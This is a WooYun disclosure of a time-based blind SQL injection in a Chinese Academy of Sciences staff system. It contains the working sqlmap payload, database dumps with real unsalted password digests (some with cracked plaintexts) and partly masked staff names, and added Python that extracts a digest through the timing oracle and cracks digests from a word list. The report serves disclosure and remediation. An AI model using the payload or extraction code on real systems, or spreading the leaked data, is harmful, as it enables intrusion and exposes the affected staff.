Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0156097

Title: SQL injection in a Chinese Academy of Sciences system leaks passwords, mobile numbers, e-mail addresses and other data of all headquarters staff

Affected vendor: Chinese Academy of Sciences

Author: Paladin1412

Submitted: 2015-11-26 17:52

Fix deadline: 2016-01-14 17:28

Published: 2016-01-14 17:28

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed to a third-party partner organization (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-26: Details sent to the vendor, awaiting vendor handling
2015-11-30: Vendor confirmed; details visible to the vendor only
2015-12-10: Details opened to core white hats and domain experts
2015-12-20: Details opened to regular white hats
2015-12-30: Details opened to intern white hats
2016-01-14: Details opened to the public

Brief description:

CAS seems to have quite a few injection bugs.

Details:

CAS headquarters staff lookup system
Address: **.**.**.**/
The username parameter of the login form (POST: username, passwd, x, y) is injectable; sqlmap confirmed it as time-based blind injection against MySQL.
The database account used by the application has DBA privileges.
The account names, password hashes (several of which sqlmap cracked from a word list), mobile numbers, e-mail addresses and other records of all headquarters staff can be retrieved.

Proof:

---
back-end DBMS: MySQL 5.0.12
available databases [6]:
[*] hrcx
[*] information_schema
[*] myexam
[*] mysql
[*] performance_schema
[*] test
---
back-end DBMS: MySQL 5.0.12
Database: hrcx
[13 tables]
+-------------+
| bgqs |
| ctrl_system |
| departmen |
| log |
| menudir |
| rolemenu |
| ry |
| ry0 |
| ry00 |
| ry131113 |
| ry201310 |
| ry201405 |
| zw |
+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))bxSH) AND 'iqCP'='iqCP&passwd=123&x=71&y=5
---
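The payload above (username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))bxSH) AND 'iqCP'='iqCP) only works because the username value is pasted into the SQL text, and sqlmap turns the resulting delay into a yes/no oracle to read the database one bit at a time. The following is an added example, not code from the original report or from the affected system: it rebuilds that situation locally with an in-memory SQLite database and a user-defined SLEEP() function standing in for MySQL's, so the report's payload shape runs unchanged, and it extracts the admin password digest from the ry table (table and column names usernam/passwd taken from the dump; the rows, the 0.2-second delay and the login helper functions are assumptions for the demonstration). The parameterized login beside it is not affected by the same input.

```python
"""Time-based blind SQL injection, reproduced locally (added example).

The target was a JSP application on MySQL; it is simulated here with SQLite
plus a registered SLEEP() function (SQLite has none), so the payload from the
sqlmap output runs as-is.  Rows, delay and helper names are constructed.
"""
import hashlib
import sqlite3
import time

DELAY = 0.2                # seconds the injected SLEEP() pauses; sqlmap used 5
THRESHOLD = DELAY / 2      # response slower than this => injected condition true
HEX = "0123456789ABCDEF"   # alphabet of the dumped 32-hex digests


def md5_hex(text):
    # Unsalted MD5 mirrors what the dump shows; it is itself a weakness.
    return hashlib.md5(text.encode()).hexdigest().upper()


EXPECTED_ADMIN_DIGEST = md5_hex("qweasd")


def _sleep(seconds):
    time.sleep(seconds)
    return 0               # MySQL's SLEEP() also returns 0 after pausing


def make_db():
    db = sqlite3.connect(":memory:")
    db.create_function("SLEEP", 1, _sleep)
    db.execute("CREATE TABLE ry (usernam TEXT, passwd TEXT)")
    db.executemany("INSERT INTO ry VALUES (?, ?)",
                   [("admin", EXPECTED_ADMIN_DIGEST), ("alice", md5_hex("000615"))])
    return db


def login_vulnerable(db, username, passwd):
    # Query built by string concatenation: everything after the quote in
    # `username` is executed as SQL.  This is the pattern the report implies.
    sql = "SELECT passwd FROM ry WHERE usernam='%s'" % username
    row = db.execute(sql).fetchone()
    return row is not None and row[0] == md5_hex(passwd)


def login_safe(db, username, passwd):
    # Bound parameter: the same payload is just a (non-existent) user name.
    row = db.execute("SELECT passwd FROM ry WHERE usernam=?", (username,)).fetchone()
    return row is not None and row[0] == md5_hex(passwd)


def timed(fn, db, username, passwd="123"):
    start = time.monotonic()
    fn(db, username, passwd)
    return time.monotonic() - start


def oracle(db, condition):
    """True if `condition` holds inside the database, judged only by delay.
    Same shape as the report's payload, with SLEEP() made conditional."""
    payload = ("admin' AND (SELECT * FROM (SELECT(CASE WHEN (%s) THEN SLEEP(%s) "
               "ELSE 0 END))bxSH) AND 'iqCP'='iqCP" % (condition, DELAY))
    return timed(login_vulnerable, db, payload) > THRESHOLD


def extract_hash(db, username, length=32):
    """Recover the digest one hex digit at a time: four timed requests per
    digit (binary search over 16 symbols).  SQLite compares bytes; MySQL's
    default collation is case-insensitive, which is why sqlmap compares
    ORD()/ASCII() values instead of characters."""
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 0, len(HEX) - 1
        while lo < hi:
            mid = (lo + hi) // 2
            cond = ("(SELECT SUBSTR(passwd,%d,1) FROM ry WHERE usernam='%s') > '%s'"
                    % (pos, username, HEX[mid]))
            if oracle(db, cond):
                lo = mid + 1
            else:
                hi = mid
        out += HEX[lo]
    return out


def demo():
    """Returns (vulnerable build slept, parameterized build did not)."""
    db = make_db()
    payload = "admin' AND (SELECT * FROM (SELECT(SLEEP(%s)))bxSH) AND 'iqCP'='iqCP" % DELAY
    return (timed(login_vulnerable, db, payload) > THRESHOLD,
            timed(login_safe, db, payload) < THRESHOLD)


if __name__ == "__main__":
    print("vulnerable slept / safe did not:", demo())
    print("first 4 digits recovered blind:", extract_hash(make_db(), "admin", length=4))
```

Full extraction of a 32-character digest costs 128 timed requests at this alphabet size; sqlmap's 5-second delay and per-request retries are why the real run is slow but reliable.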
back-end DBMS: MySQL 5.0.12
Database: hrcx
Table: ctrl_system
[4 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| act | int(5) |
| opratorid | varchar(20) |
| uptime | datetime |
| userlog | int(1) |
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
Database: hrcx
Table: ry
[121 entries]
+---------+-------------------------------------------+
| usernam | passwd |
+---------+-------------------------------------------+
| <blank> | 01F1D8C22B5FDD0FF1AAB9FE29FB5D62 |
| <blank> | 02F4E11EA84665929BAB1534F984EBFC |
| <blank> | 0369DF2B0150F75F75885A2C7E847A2F |
| <blank> | 041548D4AC32CA43BFDC25502BA45188 |
| <blank> | 047CB1E18413350FA1CE7E1B6C58FB6B |
| <blank> | 054962A69062C66A19F4D0B7BFC6D81C |
| <blank> | 06A23AD080EE28D6A68F168A720AA411 |
| <blank> | 06E8B1488A719340007D5458C17448D5 |
| <blank> | 079B1F6068742DD85E866C680EFB6BCA |
| <blank> | 07D4515F6F13AEDD6DCFCD9C8ECB22DF |
| <blank> | 07D56C0E89F0704E835AC9A2F91A617B |
| <blank> | 0878F2CF50A4D9B86CDE1BA11A8FC6F7 |
| <blank> | 09B72CB7505D3A8D2576CCF0A865CE56 |
| <blank> | 0B42CEE072F3B2497BBDA368CE1808AE |
| <blank> | 0C0191723714A2C3D0ABBACC4C751FD5 |
| <blank> | 0CEEBD04B0F772545A38DC6EFE8C5968 |
| <blank> | 0D4F22031F7586D3A0FBB59BDB17774D |
| <blank> | 0D71FAB4F115BD3F985FEA1F869E3050 |
| <blank> | 0D8744337D649993B134F09CC7127215 |
| <blank> | 0DA6526223A8E12E0F8171FD4AFBFF96 (000615) |
| <blank> | 0DB8D08B306F9553858A5183E4E96C41 |
| <blank> | 0E6B852005B045679C28936C3F91219E |
| <blank> | 0EE21FD8B90E50A1063B27501EFBD83B |
| <blank> | 0F6C1ED9784480A9206A404A40D4AB6A |
| <blank> | 1156000E0A09D568FD0851938D453DF7 |
| <blank> | 12057F6A05AF4FEA8B3F726F1C94A44B |
| <blank> | 1217A1D8748F735FA7C28813CFAF382F |
| <blank> | 12329C3BD19A22F747499C981F37B824 |
| <blank> | 1287D41F1EC111F5F1408259817D949B |
| <blank> | 1287D41F1EC111F5F1408259817D949B |
| <blank> | 1287D41F1EC111F5F1408259817D949B |
| <blank> | 12F015F3775D58F25C0A3C51B933E0B7 |
| <blank> | 13D99843AB1A3F673301BB6C808BD0A3 |
| <blank> | 13DB6B672C1273090C697672F2B26F48 |
| <blank> | 142F9E41AC080F7D1139C258A43DA22F |
| <blank> | 1509C981B0E4093E0A23A26680E7E066 |
| <blank> | 1563277E3B47FF950B2482B934D4DAF5 |
| <blank> | 15B9C535D49783210E51504CEC50905F |
| <blank> | 15BCCD61CD86E65A627095D856868655 |
| <blank> | 15F14A129902847DF223FEDEFA676A94 |
| <blank> | 1676B002DD06BAC8A34BFA3082E3C2F5 |
| <blank> | 18839B74778339542C352C2BAAF54E8C |
| <blank> | 18A983DFCB9F7E3CDF6B97EEEF56BFBC |
| <blank> | 196034D921DB4A69DFC3D6C69C89BBBF |
| <blank> | 1A55BD5B2B43EA5D6CAFE8E650E8B1AF |
| <blank> | 1ADB661DF112CF9D1995B995B5E80B13 |
| <blank> | 1B5B1A17D50CCB470ECF3D480676E95A |
| <blank> | 1BEBF9B286EE152915A3316A0B5F8C92 |
| <blank> | 1CA79EC4987F27B85094A0F6A3EBFB3A |
| <blank> | 1DD2113FBE2689F4A91B787072DAB6F0 |
| <blank> | 1E0B986B403FED6318858CC78332832E |
| <blank> | 1E5B4C2C5DB82C84183F22E1F9AA71AD |
| <blank> | 1E8ECF9C94AAA739A266B7906634B6AF |
| <blank> | 20FF06A19040A3CE7DBA415F1A088FCE |
| <blank> | 20FFDC00DF7571624723E4D7AFE31B72 |
| <blank> | 2227FA25B208A95A80659A375A75B89E (910724) |
| <blank> | 226219776B829671AF99D5E4BF114C07 |
| <blank> | 24FE7CF6FA1BB7CB956318988FFEE083 |
| <blank> | 256B85CB941D5AE5D4BEDE7F362A2BD1 |
| <blank> | 26505354B94A5356573BA0DE6FD818C2 |
| <blank> | 266346E9B40AEE51557E8E56E0D362F1 |
| <blank> | 27472D0562CB1BBD84C95BCBB77C48B5 |
| <blank> | 28135CF8CF804EDCE2B9B00DB13E0310 |
| <blank> | 282BBB8A4A2EAC5B9072A2E01FF42157 |
| <blank> | 2838EAC5E99AD27B82813233778A30D3 |
| <blank> | 28AF76CBF46B0709FA1F95D9B088B720 |
| <blank> | 2926037354404A4F0D77290DD65C278E |
| <blank> | 296A52EBA9E239FC2930764A658998B6 |
| <blank> | 299C2FC2F77CC46BBA189D65CE8438C2 |
| <blank> | 29A6D57B22625D4885DC773D2CAAAE81 |
| <blank> | 29F2BF721AF1522C86895517433513D8 |
| \x05 | 2AADE1088D6EC2DA5E6A61AB5F10648C |
| <blank> | 2B88499989E8B6C945A502842F1A0FF4 |
| <blank> | 2B88499989E8B6C945A502842F1A0FF4 |
| <blank> | 2B88499989E8B6C945A502842F1A0FF4 |
| <blank> | 2B8DE47CA1500FE4B1E7F8A91A4964CB |
| <blank> | 2CBBC8295F02FAAA559E98B1C5014D42 |
| \x02 | 2CE3F4C9A2BDA1841B43198226543E02 |
| <blank> | 2D67E74481480C93B6C705204197E1C7 |
| <blank> | 2E2112F7395568E5F71E09B382AC33D9 |
| <blank> | 2E8237F3DE1492B9AA432A76ACC7A2B8 |
| <blank> | 2EBBDB899C6896ACA8ABDE8743CD7D20 |
| <blank> | 3016D59073BEDA6340ADE41A5BAF71AC |
| <blank> | 3048E628EB8FA77CFA06039CD4772358 |
| <blank> | 331A7DBECA648B633E33B136657770C1 |
| <blank> | 33681FCB93892B7F37F15BFD31130B4D |
| <blank> | 34C59D08F64501FB649F2BDC9165ABC1 |
| <blank> | 34C59D08F64501FB649F2BDC9165ABC1 |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 374EAF12AD40059F1699113B925CBA61 |
| <blank> | 378635CAFA81DAC2F6015D74B8260BB1 |
| <blank> | 37F00FB4E8EF5AB2F52AEDD52AE9C5D6 |
| <blank> | 3A148FB1884539493D9F858354C971DD |
| <blank> | 3C83AAC0CB8FBCF3D41058FBAD579F3E |
| <blank> | 3CC2102A88432C00A0E7C3A4A56E2C0A |
| <blank> | 3CCB86EBBD02A63D3F2A261D0FE6EDCB |
| <blank> | 3D5899B6DBBFBC9A4859FB0B8F6115AE |
| <blank> | 3D8FEB0D501184650DA168FCFE406788 |
| <blank> | 3D9188577CC9BFE9291AC66B5CC872B7 (123465) |
| <blank> | 3D92BE376FAFE5C21430310CD58D38A6 |
| <blank> | 3E21244CFF134F259075A88896E732B6 |
| <blank> | 3E2858F5C64F79A696A1BCEB0EC708C6 |
| <blank> | 3ED5BE72477E00889EEB4BF751531D5D |
| <blank> | 3F06DB47F777320150C63E9FF1D56308 |
| <blank> | 40377ABF95F5B970938E7CFC014EEB7E |
| <blank> | 4155294482F766964E9E42AC197E927B |
| <blank> | 416D3C93C9AA21EBA16CADC7365AF981 |
| <blank> | 416FD889C4095E59F0875FCA0FA36C6B |
| <blank> | 4210C0A8FFE473485D2C5DD736995232 |
+---------+-------------------------------------------+
---
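Two things about the passwd column above matter more than the cracked plaintexts in parentheses: every value is a bare 32-hex digest with no salt field, and the same digest recurs across accounts (36F17C3939AC3E7B2FC9396FA8E953EA thirteen times, 1287D41F1EC111F5F1408259817D949B and 2B88499989E8B6C945A502842F1A0FF4 three times each, 34C59D08F64501FB649F2BDC9165ABC1 twice), which is only possible when identical passwords hash to identical values, i.e. without a per-user salt. The following added example, not code from the original report, takes those digests as copied from the dump, shows the duplicate-group check and the one-table-covers-everyone word-list attack that unsalted MD5 permits, and contrasts it with salted PBKDF2 storage. The word list is constructed; whether any entry other than those sqlmap labelled actually matches is not claimed.

```python
"""Unsalted digests from the dump versus salted storage (added example)."""
import hashlib
import hmac
import os
from collections import Counter

# Digests copied from the sqlmap dump above (a subset); names omitted there too.
DUMPED = (
    ["1287D41F1EC111F5F1408259817D949B"] * 3
    + ["2B88499989E8B6C945A502842F1A0FF4"] * 3
    + ["34C59D08F64501FB649F2BDC9165ABC1"] * 2
    + ["36F17C3939AC3E7B2FC9396FA8E953EA"] * 13
    + ["01F1D8C22B5FDD0FF1AAB9FE29FB5D62", "3D9188577CC9BFE9291AC66B5CC872B7",
       "0DA6526223A8E12E0F8171FD4AFBFF96", "2227FA25B208A95A80659A375A75B89E"]
)

# Constructed word list; includes the plaintexts sqlmap reported in the dump.
WORDLIST = ["123456", "password", "qweasd", "123465", "000615", "910724", "admin"]

PBKDF2_ITERATIONS = 100_000   # assumption for the demo; tune to ~100 ms per hash


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest().upper()


def duplicate_groups(digests):
    """Digests shared by several accounts.  Any group here proves the scheme
    has no per-user salt: a salted scheme gives unequal records for equal
    passwords, so duplicates could not appear."""
    counts = Counter(d.upper() for d in digests)
    return {d: n for d, n in counts.items() if n > 1}


def crack_md5(digests, wordlist):
    """One precomputed table serves every account at once because nothing
    per-user enters the hash.  Returns {digest: plaintext} for the hits."""
    table = {md5_hex(word): word for word in wordlist}
    return {d: table[d] for d in {x.upper() for x in digests} if d in table}


def salted_hash(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Random 16-byte salt plus a slow KDF; record format 'salthex$dkhex'."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt.hex() + "$" + dk.hex()


def verify_salted(password, record, iterations=PBKDF2_ITERATIONS):
    salt_hex, dk_hex = record.split("$", 1)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), iterations)
    return hmac.compare_digest(dk.hex(), dk_hex)   # constant-time comparison


if __name__ == "__main__":
    print("shared digests (count of accounts):", duplicate_groups(DUMPED))
    print("word-list hits against the dump:", crack_md5(DUMPED, WORDLIST))
    a, b = salted_hash("qweasd"), salted_hash("qweasd")
    print("same password, two salted records differ:", a != b, verify_salted("qweasd", a))
```

The duplicate-group count is the quickest triage signal when reviewing a dumped credential table: it needs no cracking at all and already tells you that one cracked hash unlocks every account sharing it.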
web application technology: JSP
back-end DBMS: MySQL 5.0.12
Database: hrcx
+-------------+---------+
| Table | Entries |
+-------------+---------+
| log | 8974 |
| ry | 468 |
| ry201310 | 452 |
| ry00 | 448 |
| ry131113 | 448 |
| ry0 | 445 |
| ry201405 | 442 |
| departmen | 14 |
| menudir | 6 |
| zw | 5 |
| bgqs | 4 |
| rolemenu | 4 |
| ctrl_system | 1 |
+-------------+---------+
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
Database: hrcx
Table: ry201405
[91 entries]
masked region
*****----------+--------+---*****
***** realname | roleid | sf*****
*****----------+--------+---*****
***** 彭颖 | 2 *****
*****^^振龙 | 3 |*****
*****^永强 | 3 | *****
*****^^青怡 | 3 |*****
*****^^红娟 | 3 |*****
***** 陈琼 | 3 *****
***** 罗雯 | 3 *****
*****^^芳芳 | 3 |*****
***** 周鼐 | 3 *****
***** 张燕 | 2 *****
*****^^玲俐 | 2 |*****
*****^^维佐 | 3 |*****
*****^^胜先 | 3 |*****
*****^^玲媛 | 3 |*****
***** 刘杰 | 3 *****
***** 李杰 | 3 *****
***** 刘毅 | 3 *****
*****^^建基 | 3 |*****
***** 董麒 | 3 *****
*****^^良强 | 3 |*****
***** 燕琳 | 3 *****
*****^^明辉 | 3 |*****
*****^^伟伟 | 3 |*****
*****^^子龙 | 3 |*****
*****^^京生 | 3 |*****
*****^^文清 | 3 |*****
*****^^京华 | 3 |*****
*****^^昊泉 | 3 |*****
***** 马扬 | 3 *****
***** | 潘教峰 | 3 *****
*****^^一琪 | 3 |*****
***** 王宁 | 3 *****
*****^^令波 | 3 |*****
*****^^贾娟 | 3 |*****
*****^^晓风 | 3 |*****
*****^^光锋 | 3 |*****
***** 赵涛 | 3 *****
*****^^颖虹 | 3 |*****
*****| 易志军 | 3 *****
*****^^博伦 | 3 |*****
*****^^小东 | 3 |*****
***** 刘黎 | 3 *****
*****^^荣铉 | 3 |*****
*****^^英杰 | 3 |*****
*****^^显杰 | 3 |*****
*****^^启治 | 3 |*****
*****^^丽霞 | 3 |*****
*****^^骏平 | 3 |*****
*****^^亚东 | 3 |*****
***** 田原 | 2 *****
***** 冯霞 | 3 *****
***** 尹叶 | 3 *****
***** 刘珊 | 3 *****
*****^^桂强 | 3 |*****
*****^^承会 | 3 |*****
***** 王健 | 3 *****
*****^^凤霞 | 3 |*****
***** 房晖 | 3 *****
*****^^晓明 | 3 |*****
***** 王菲 | 3 *****
***** 唐清 | 3 *****
*****^^书林 | 3 |*****
*****^^建军 | 3 |*****
*****^^永生 | 3 |*****
*****^^晓莉 | 3 |*****
*****^^燕华 | 3 |*****
***** 郝帅 | 3 *****
*****^^晴晴 | 3 |*****
***** 盛夏 | 3 *****
***** 冯剑 | 3 *****
*****^^俊梅 | 3 |*****
*****^^克强 | 3 |*****
***** 陶诚 | 3 *****
***** 严枫 | 3 *****
*****^^伟刚 | 3 |*****
***** 吕远 | 3 *****
*****^^广义 | 3 |*****
***** 杨辉 | 3 *****
*****^^鹏飞 | 3 |*****
***** 李静 | 3 *****
*****^^连清 | 2 |*****
***** 李定 | 3 *****
***** 李强 | 3 *****
***** 杨萍 | 3 *****
***** 王希 | 3 *****
***** | 谭铁牛 | 3 *****
***** 柳岸 | 3 *****
***** 冯越 | 3 *****
***** 苗鸿 | 3 *****
***** 田天 | 3 *****
*****^^龙新 | 3 |*****
*****-+----------+--------+*****

Fix recommendation:

Filter the input. Filtering alone is not a complete fix: build the query with bound parameters (a JDBC PreparedStatement in this JSP application) instead of string concatenation, run the application with a database account that does not hold DBA privileges and can only reach the hrcx schema, and replace the unsalted 32-hex digests in the ry table with a salted slow password hash, since identical digests for identical passwords let one cracked value unlock every account that shares it.

Copyright notice: when reposting, credit Paladin1412@WooYun as the source


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-11-30 17:27

Vendor reply:

CNVD has confirmed and reproduced the vulnerability described; it has been forwarded by CNCERT to the superior management unit, which will coordinate handling with the website's administrators.

Latest status:

None